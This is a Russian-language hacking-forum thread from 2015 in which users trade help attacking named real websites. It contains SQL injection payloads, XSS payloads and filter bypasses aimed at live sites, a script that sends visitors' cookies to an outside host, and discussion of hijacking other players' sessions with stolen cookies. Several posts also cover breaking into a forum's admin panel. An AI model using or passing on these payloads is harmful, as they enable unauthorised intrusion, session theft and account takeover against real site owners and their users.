Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1
Connection: keep-alive
Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?


Использовать ascii(mid(version(),1,4)) или ord(mid(version(),1,4))

faza02
09.07.2015, 12:05
SaNDER said:
↑ (https://antichat.live/posts/3866485/)
Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь
Сведения об уязвимости
обнаружено, что данные пароля передаются через HTTP.
влияние
Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.
Действия, чтобы Взять
См средство для решения.
Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.
средство
Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.
Форма цель действия :
http://*******.ru/wp-login.php
. Сайт я не скажу естественно . Дак вот что мне нужно сделать? .
Есть HTML код страницы
Spoiler
?

******.ru › Войти

*******.ru
-->

Имя пользователя

Пароль

Запомнить меня

Регистрация | Забыли пароль?

function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}
wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();

document.write("")

← Назад к сайту «*******.ru»

Не знаю поможет ли это :
GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1
Cache-Control: no-cache
Referer:
http://*****.ru/wp-admin/post.php?action=edit&post={post-id} (http://*****.ru/wp-admin/post.php?action=edit&post=%7Bpost-id%7D)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: ******
Host: ****.ru
Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d
Accept-Encoding: gzip, deflate
---------------------------------------------------------------------------------------
robots.txt :
User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Allow: /doc/
Allow: /img/
Allow: /wp-content/uploads/
-------------------------------------------
Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.
HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )
влияние
Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.
Действия, чтобы Взять
См средство для решения.
Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).
средство
Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.
Внешние ссылки
Как это сделать ? .
-----------------------------------------------------------------------------------
Url
http://*******.ru/wp-login.php?action=lostpassword (http://helpset.ru/wp-login.php?action=lostpassword)
Identified Field Name user_login .
Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.
Это были важные поля, такие как "кредитная карта".
Влияние
Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.
Действия, чтобы Взять
Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.
Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.
Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.
Требуемые навыки для успешной эксплуатации
Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.
Внешние ссылки
Использование автозаполнения в HTML форм
П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .
-----------------------------------------------------------------------
Url
http://*******.ru/crossdomain.xml
Правила политики
Классификация Классификация
OWASP 2010 A6
OWASP 2013 А5
КВО 16
WASC 15
Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.
влияние
Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.
средство
Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.
Внешние ссылки
Рекомендации по использованию файла политики кросс-доменных для Flash Player
Crossdomain.xml приглашает Cross-Site Mayhem .
Как это сделать?
[/spoiler=Инфа которая поможет]


1. логины пароли идут не через SSL

2. у кук нет свойства httpOnly

3. crossdomain.xml: читать тут /threads/300591/ (https://antichat.live/threads/300591/)

faza02
09.07.2015, 12:07
djon said:
↑ (https://antichat.live/posts/3866466/)
-------------------------------------------------------------------------------------------------------------------------------------------------
Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to '
http://www.site.ru/p1/dk.php
' in /home/u941469589/public_html/upload.php on line 12
-------------------------------------------------------------------------------------------------------------------------------------------------
сама форма
-------------------------------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------
сам upload.php
-------------------------------------------------------------------------------------------------------------------------------------------------
1024*3*1024)
{
echo ("Размер файла превышает три мегабайта");
exit;
}
// Проверяем загружен ли файл
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
// Если файл загружен успешно, перемещаем его
// из временной директории в конечную
move_uploaded_file($_FILES["filename"]["tmp_name"], "
http://www.site.ru/p1/
".$_FILES["filename"]["name"]);
} else {
echo("Ошибка загрузки файла");
}
?>
-------------------------------------------------------------------------------------------------------------------------------------------------


путь должен быть локальным. у вас он есть в ошибке: /home/u941469589/public_html/

Br@!ns
09.07.2015, 13:51
Помогите с выводом:

https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+order+by+9+--+

https://www.ibethel.org/payments/co...e_idr=144'+and+substring(@@version,1,1)=5+--+ (https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+and+substring(@@vers ion,1,1)=5+--+)

faza02
09.07.2015, 14:18
Br@!ns said:
↑ (https://antichat.live/posts/3866551/)
Помогите с выводом:
https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+order+by+9+--+
https://www.ibethel.org/payments/co...e_idr=144'+and+substring(@@version,1,1)=5+--+ (https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+and+substring(@@vers ion,1,1)=5+--+)


в таких случаях через blind парсите select info from information_schema.processlist и смотрите, почему так и как можно получить вывод

ocheretko
10.07.2015, 03:02
Иньекция в переменную JavaScript

Здравствуйте, подскажите, почему не выполняется alert:


Code:
http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPo AFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKk Dxz3zZHTsR-u1N6ySOikXD104RF&search=1

Вывод:


Code:
'searchText': '\\'}; Alert(/Xss/);///*',

-----------------------------------------------------------------------------------

Похожая проблема у меня и вот с этой xss:


Code:
http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid=

Вывод:


Code:
pageLog["q"] = "\\\";alert();//";

frank
10.07.2015, 11:15
ocheretko said:
↑ (https://antichat.live/posts/3866736/)
Иньекция в переменную JavaScript
Здравствуйте, подскажите, почему не выполняется alert:

Code:
http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPo AFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKk Dxz3zZHTsR-u1N6ySOikXD104RF&search=1

Вывод:

Code:
'searchText': '\\'}; Alert(/Xss/);///*',

-----------------------------------------------------------------------------------
Похожая проблема у меня и вот с этой xss:

Code:
http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid=

Вывод:

Code:
pageLog["q"] = "\\\";alert();//";




ну вот в этом случае


http://0-99.net/? (http://0-99.net/)


экранируется ' и вы не выходите за пределы значения параметра, соответственно все воспринимается как текст(значение параметра)

ocheretko
10.07.2015, 12:30
мне почему то думалось, что экранирующий слеш экранируется вторым слешом, и стает не экранированным

faza02
10.07.2015, 12:46
ocheretko said:
↑ (https://antichat.live/posts/3866824/)
мне почему то думалось, что экранирующий слеш экранируется вторым слешом, и стает не экранированным


все верно. однако alert() у вас с большой буквы, такой функции нет. а во втором случае вы как раз не выходите за пределы кавычек, там же их три - \\\"

Br@!ns
10.07.2015, 23:14
http://www.sawadee.com/lib6/gmap/gmap3_aj.php?lg=en&q=tyfghfjjjjjjjgty') (http://www.sawadee.com/lib6/gmap/gmap3_aj.php?lg=en&q=tyfghfjjjjjjjgty%27%29)

Что нибудь интересненькое сделать можно?

SaNDER
11.07.2015, 14:48
Что это?

http://4cheat.ru/admincp/ единственное что там интересует дак токо это throttlepostsadmin.php (http://4cheat.ru/admincp/throttlepostsadmin.php) . При переходе кидает сюда http://4cheat.ru/admincp/throttlepostsadmin.php . Но там тупо постое окно . Что делать? .

djon
11.07.2015, 23:50
Можно ли скрипт img = new Image(); img.src = "http://qoo.by/3aG? (http://qoo.by/3aG)"+document.cookie; укоротить до 45 символов ?

3ran
11.07.2015, 23:56
SaNDER said:
↑ (https://antichat.live/posts/3867184/)
Что это?
http://4cheat.ru/admincp/
единственное что там интересует дак токо это
throttlepostsadmin.php (http://4cheat.ru/admincp/throttlepostsadmin.php)
. При переходе кидает сюда
http://4cheat.ru/admincp/throttlepostsadmin.php
. Но там тупо постое окно . Что делать? .


Все просто,юзай вот эту ссылку - http://4cheat.ru/modcp/

3ran
12.07.2015, 00:00
djon said:
↑ (https://antichat.live/posts/3867373/)
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG? (http://qoo.by/3aG)
"+document.cookie; укоротить до 45 символов ?


Проще будет отредактировать максимальное количество вводимых символов в исходном коде.

Да,и js не запустится через сократитель ссылок

ocheretko
12.07.2015, 01:23
djon said:
↑ (https://antichat.live/posts/3867373/)
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG? (http://qoo.by/3aG)
"+document.cookie; укоротить до 45 символов ?


Подключите удаленный скрипт

Bragal
12.07.2015, 02:41
На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д Как админ так хитро ограничил доступ?

OxoTnik
12.07.2015, 02:54
Bragal said:
↑ (https://antichat.live/posts/3867418/)
На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д
Как админ так хитро ограничил доступ?


Ничего хитрого, просто правильно расставлены ограничения.

Bragal
12.07.2015, 03:09
OxoTnik said:
↑ (https://antichat.live/posts/3867419/)
Ничего хитрого, просто правильно расставлены ограничения.


И каким же образом? Реально обойти без получения рута?

faza02
12.07.2015, 11:32
djon said:
↑ (https://antichat.live/posts/3867373/)
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG? (http://qoo.by/3aG)
"+document.cookie; укоротить до 45 символов ?




ocheretko said:
↑ (https://antichat.live/posts/3867402/)
Подключите удаленный скрипт


на всякий случай можно без кавычек и без http.

SaNDER
12.07.2015, 13:32
3ran said:
↑ (https://antichat.live/posts/3867377/)
Все просто,юзай вот эту ссылку -
http://4cheat.ru/modcp/


Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .

nik1201
12.07.2015, 15:23
Привет всем,можно ли создать скрипт самоудаляющейся чтобы и теги его тоже удалялись?

EoGeneo
13.07.2015, 00:11
nik1201 said:
↑ (https://antichat.live/posts/3867523/)
Привет всем,можно ли создать скрипт
самоудаляющейся чтобы и теги его тоже удалялись?


можно

ocheretko
13.07.2015, 00:35
Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:


Code:
alert(/olololkin2/);

Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox


Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1

User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

В первый раз такое. Адрес:


Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221

faza02
13.07.2015, 00:53
ocheretko said:
↑ (https://antichat.live/posts/3867688/)
Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:

Code:
alert(/olololkin2/);

Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox

Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1

User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

В первый раз такое. Адрес:

Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221



я пока сам не понял в чем дело, однако prompt() срабатывает:


Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E

kingbeef
13.07.2015, 01:40
Xss есть, почитай js файлы, prompt работает

http://100ads.net/registration/?a=0&refererNickname=">prompt() (http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3Eprompt%28%29%3C/script%3E)

3ran
13.07.2015, 04:18
SaNDER said:
↑ (https://antichat.live/posts/3867487/)
Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .


А ты думал достаточно просто найти админку?)

Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.

Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.

nik1201
13.07.2015, 14:07
EoGeneo said:
↑ (https://antichat.live/posts/3867684/)
можно


Подскажи пжл как такой скрипт составить.

SaNDER
13.07.2015, 14:27
3ran said:
↑ (https://antichat.live/posts/3867727/)
А ты думал достаточно просто найти админку?)
Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.


vBulletin 3.8.6 . Сплоиты не могу найти и юзать я их тоже не умею .

Br@!ns
13.07.2015, 18:47
http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8'

Можно что нибудь сделать?

OxoTnik
13.07.2015, 18:50
Br@!ns said:
↑ (https://antichat.live/posts/3867909/)
http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8
'
Можно что нибудь сделать?


нет

ocheretko
13.07.2015, 23:54
Действительно срабатывает.


OxoTnik said:
↑ (https://antichat.live/posts/3867911/)
нет


Можно.

XSS уязвимость.

$url = "http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8\'";

$referer = "\">alert(/antichat/);";

frank
14.07.2015, 13:15
yarbabin said:
↑ (https://antichat.live/posts/3867697/)
я пока сам не понял в чем дело, однако prompt() срабатывает:

Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E



И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...


Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20o nerror=alert%28/1/%29%3E

RedFern.89
14.07.2015, 15:22
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку


Code:
http://navi-gaming.com/en/achievements?id[]=71



Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\

ocheretko
15.07.2015, 00:49
frank said:
↑ (https://antichat.live/posts/3868134/)
И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...

Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20o nerror=alert%28/1/%29%3E



Вот так работает:


Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3EsetTimeout%28%22 alert%28123%29%22,1000%29;%3C/script%3E%3Ca%20x=%22

Связано это с тем, что происходит назначение window.alert=function(text){$.DF.Popup.open из файла http://100ads.net/scripts/df.js и в это же самое время мы вызываем функцию алерт. Если добавить таймаут все ок

SaNDER
15.07.2015, 14:34
RedFern.89 said:
↑ (https://antichat.live/posts/3868201/)
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку

Code:
http://navi-gaming.com/en/achievements?id[]=71


Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\



Спрашивал с одного форума и вот что говорят,цитирую : "Он явно посчитал page за число и каким-то образом сделал из него -1, умножив затем на количество элементов, которые нужно достать, получив offset равный -7. Я полагаю, там (int) $_GET['page'], а дальше просто ошибка алгоритма, так что это не инъекция."

Root2
16.07.2015, 09:26
Подскажите пожалуйста.

Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.

Пробывал так

unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.

convert(group_concat(users)+using+ascii) пустое поле выдает.

CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'

Как быть?

ocheretko
16.07.2015, 14:11
RedFern.89 said:
↑ (https://antichat.live/posts/3868201/)
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку

Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\



Раскрутить не получилось, но XSS получилось.


Code:
xss http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,YWxlcnQoL1 hTU1BPU0VELyk=%3E
http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,ZG9jdW1lbn QubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZm9ydW0uYW50aWNo YXQucnUnOw==%3E

WAF только на формы, обход через Request_Uri

faza02
16.07.2015, 14:38
Root2 said:
↑ (https://antichat.live/posts/3868985/)
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.

convert(group_concat(users)+using+ascii) пустое поле выдает.

CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?


если просто в hex? есть вывод?

Root2
16.07.2015, 17:02
yarbabin said:
↑ (https://antichat.live/posts/3869086/)
если просто в hex? есть вывод?


Нет тоже информация не отоброжается

kingbeef
17.07.2015, 22:57
Root2 said:
↑ (https://antichat.live/posts/3868985/)
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.

convert(group_concat(users)+using+ascii) пустое поле выдает.

CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?


concat_ws(0x3a,convert(users%20using%20utf8))

А так ?

Root2
18.07.2015, 09:44
kingbeef said:
↑ (https://antichat.live/posts/3869669/)
concat_ws(0x3a,convert(users%20using%20utf8))
А так ?


Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?

kingbeef
18.07.2015, 14:52
Root2 said:
↑ (https://antichat.live/posts/3869763/)
Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?


Покажи ссылку

Aiera
19.07.2015, 00:49
Помогите, попал в тупик.

Вот страница - http://www.ezar.ru/?a=reg

Поле "логин" уязвимое, посылается форма через POST на http://www.ezar.ru/prereg.php , там вылетает Warning: mysql_num_rows()

Что делать дальше? Попробовал подбирать поля, подменяя запросы через Burp, но что то нифига не получается.

ocheretko
19.07.2015, 01:21
Пока мы попытаемся помочь Вам из SqlInj, можете поиграться с ихними XSS:


Code:
1) http://www.ezar.ru/testd.php?domain=ezar.ru&nick=

2) url: http://www.ezar.ru/prereg.php
POST: tarif=10&konstrukotor=yes&login=11&nick2=%3Cscript%3Ealert%28%2fXSSPOSED%2f%29%3B%3C% 2fscript%3E&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK

Чтобы не мучится с POST, работайте так:


Code:
http://www.ezar.ru/prereg.php?tarif=10&konstrukotor=yes&nick2=nick&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK&login='

mazaxaka
19.07.2015, 14:19
подскажите как юзнуть ету уязвимость


Code:
PHP Object Injection
Userinput reaches sensitive sink. For more information, press the help icon on the left side.
12: unserialize $data = unserialize($compressed);
9: $compressed = base64_decode($cookieData);
8: $cookieData = str_replace('#', '+', $cookieData);
6: $cookieData = $_COOKIE['___389_shR7_ZeE'];

ErrNick
19.07.2015, 15:16
изучите данный материал для начала

https://rdot.org/forum/showthread.php?t=950

http://raz0r.name/tag/unserialize/

faza02
19.07.2015, 20:24
palec2006 said:
↑ (https://antichat.live/posts/3870226/)
чёт не могу дупля отстрелить

Code:
POST /search/ HTTP/1.1
Content-Length: 81
Host: www.fortun.ru
Connection: Keep-alive
Accept: */*

articles=1&news=1&pages=1&query='and extractvalue(1,concat(0x3a,(version())))and'

select фильтрует, всё пропало?




Code:
POST /calc/save_form/ HTTP/1.1
Host: www.fortun.ru
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.fortun.ru/calc/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

element%5B28|extractvalue(1,concat(0x3a,(select version())))%5D=on

nik1201
21.07.2015, 16:48
Привет всем,нашел атаку на сайте при создание ника можно в поле ника вписывать разные скрипты и все робит,допустим вписываю ява скрипт алерт и сообщение вылазит везде где отображается мой ник и еще когда захожу в админ панель и там скрипт тоже исполняется http://s1.sendimage.me/qGfEkvIk.png но собственно сам вопрос как можно взломать сайт при поможи этого?

ocheretko
22.07.2015, 04:22
Как пример - почитайте здесь /threads/395565/ (https://antichat.live/threads/395565/)

nik1201
22.07.2015, 09:57
Да там куки почему то на сайте не подмениваются

ocheretko
22.07.2015, 13:46
Поставьте вопрос более конкретно, с описанием всех Ваших действий

nik1201
22.07.2015, 17:16
Привет всем,вот мне приходят куки с форума игры.

------------------------------------------------------------------------------------------------------

w2vL_cca8_lastvisit=1437004847;

w2vL_cca8_nofavfid=1;

PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;

w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;

w2vL_cca8_lastcheckfeed=21728%7C1437560824;

w2vL_cca8_visitedfid=45D46D53D2;

w2vL_cca8_viewid=tid_6189;

w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663;

w2vL_cca8_smile=1D1;

__zlcmid=Vienkp6pQjrijA;

_ga=GA1.2.956537111.1436906922F;

w2vL_cca8_lastact=1437566946%09forum.php%09;

w2vL_cca8_onlineusernum=59;

w2vL_cca8_sid=ro6N6g

------------------------------------------------------------------------------------------------------

Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.

------------------------------------------------------------------------------------------------------

1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3

2)_ga=GA1.2.956537111.1436906922F

------------------------------------------------------------------------------------------------------

Но когда заменяю на форуме ,куки не подмениваются.

------------------------------------------------------------------------------------------------------

Сайт выглядит такого типа www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php)

На www.site.ru (http://www.site.ru) расположен профиль игрока,тут короче выбираешь сервер и играешь.

На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.

В чем может быть проблема?

frank
22.07.2015, 18:00
nik1201 said:
↑ (https://antichat.live/posts/3871409/)
Привет всем,вот мне приходят куки с форума игры.
------------------------------------------------------------------------------------------------------
w2vL_cca8_lastvisit=1437004847;

w2vL_cca8_nofavfid=1;

PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;

w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;

w2vL_cca8_lastcheckfeed=21728%7C1437560824;

w2vL_cca8_visitedfid=45D46D53D2;

w2vL_cca8_viewid=tid_6189;

w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663;

w2vL_cca8_smile=1D1;

__zlcmid=Vienkp6pQjrijA;

_ga=GA1.2.956537111.1436906922F;

w2vL_cca8_lastact=1437566946%09forum.php%09;

w2vL_cca8_onlineusernum=59;

w2vL_cca8_sid=ro6N6g
------------------------------------------------------------------------------------------------------
Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.
------------------------------------------------------------------------------------------------------
1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3

2)_ga=GA1.2.956537111.1436906922F
------------------------------------------------------------------------------------------------------
Но когда заменяю на форуме ,куки не подмениваются.
------------------------------------------------------------------------------------------------------
Сайт выглядит такого типа www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php)

На www.site.ru (http://www.site.ru) расположен профиль игрока,тут короче выбираешь сервер и играешь.

На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.

В чем может быть проблема?


Обычно с тем что там разные профили при регистрации, разные движки и базы данных.

nik1201
22.07.2015, 19:10
Там на форуме на моих куках есть еще 2 строчки которые сниффер не ловит.

------------------------------------------------------------------------------------------------------

w2vL_cca8_auth

and

w2vL_cca8_saltkey

------------------------------------------------------------------------------------------------------

Почему эти стрчки не идут,хотя скрипт то стоит на /forum/forum.php а не на www.site.ru? (http://www.site.ru)

И что можно сделать что бы они шли?

faza02
22.07.2015, 19:55
nik1201 said:
↑ (https://antichat.live/posts/3871456/)
Там на форуме на моих куках есть еще 2 строчки которые сниффер не ловит.

------------------------------------------------------------------------------------------------------
w2vL_cca8_auth

and

w2vL_cca8_saltkey
------------------------------------------------------------------------------------------------------
Почему эти стрчки не идут,хотя скрипт то стоит на /forum/forum.php а не на www.site.ru? (http://www.site.ru)

И что можно сделать что бы они шли?


может у них флаг httponly?

frank
22.07.2015, 21:09
yarbabin said:
↑ (https://antichat.live/posts/3871466/)
может у них флаг httponly?


я так же подумал в начале, но ник1201 пишет о снифере, а если он подразумевает под снифером все-таки снифер, а не скрипт с document.cookie, то там будут видны все куки... хотя, фраза ко мне приходят... я запутался

nik1201
22.07.2015, 21:47
